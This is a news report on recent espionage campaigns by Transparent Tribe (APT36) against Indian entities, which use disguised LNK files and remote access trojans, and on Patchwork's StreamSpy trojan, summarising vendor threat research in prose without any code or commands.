The cyber threat group Transparent Tribe has launched a series of new attacks targeting various Indian governmental, academic, and strategic entities using a remote access trojan (RAT) to gain persistent control over compromised systems.
According to a technical report by CYFIRMA, the campaign involves deceptive delivery methods, including a weaponized Windows shortcut (LNK) file disguised as a legitimate PDF document embedded with full PDF content to avoid detection by users.
Transparent Tribe, also known as APT36, is a state-sponsored hacking group known for conducting cyber espionage campaigns against Indian organizations since at least 2013.
The group utilizes a range of RATs in its attacks, including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.
The recent attacks began with a spear-phishing email containing a ZIP archive with a disguised LNK file. When opened, the file triggers the execution of a remote HTML Application (HTA) script using “mshta.exe” to decrypt and load the final RAT payload into memory.
The malware is designed to adapt its persistence method based on the antivirus solutions detected on the infected system, ensuring successful deployment.
The RAT deployed in these attacks, named “iinneldc.dll,” functions as a full-featured RAT with capabilities for remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control.
APT36 continues to pose a persistent threat to Indian government entities, educational institutions, and other strategic sectors with a focus on intelligence collection.
In a separate campaign, APT36 has been linked to the distribution of a malicious shortcut file disguised as a government advisory PDF, which leads to the installation of a .NET-based loader for remote command execution and system reconnaissance.
The malware leverages various techniques to establish persistence, communicate with command-and-control servers, and evade detection.
Connection to Patchwork and StreamSpy Trojan
Recently, the hacking group Patchwork, also known as Dropping Elephant or Maha Grass, has been associated with attacks targeting Pakistan’s defense sector using a Python-based backdoor distributed via phishing emails.
The group has also been linked to the StreamSpy Trojan, which utilizes WebSocket and HTTP protocols for command-and-control communication. The trojan shares similarities with the Spyder variant of the WarHawk backdoor attributed to SideWinder.
The malware distributed by Patchwork can harvest system information, establish persistence, communicate with C2 servers, and execute various commands.
The emergence of StreamSpy and Spyder variants from Patchwork indicates ongoing development of attack tools by the group.
Overall, the evolving tactics and tools used by Transparent Tribe and Patchwork highlight the continuous threat posed by these cyber espionage groups to organizations in the region.
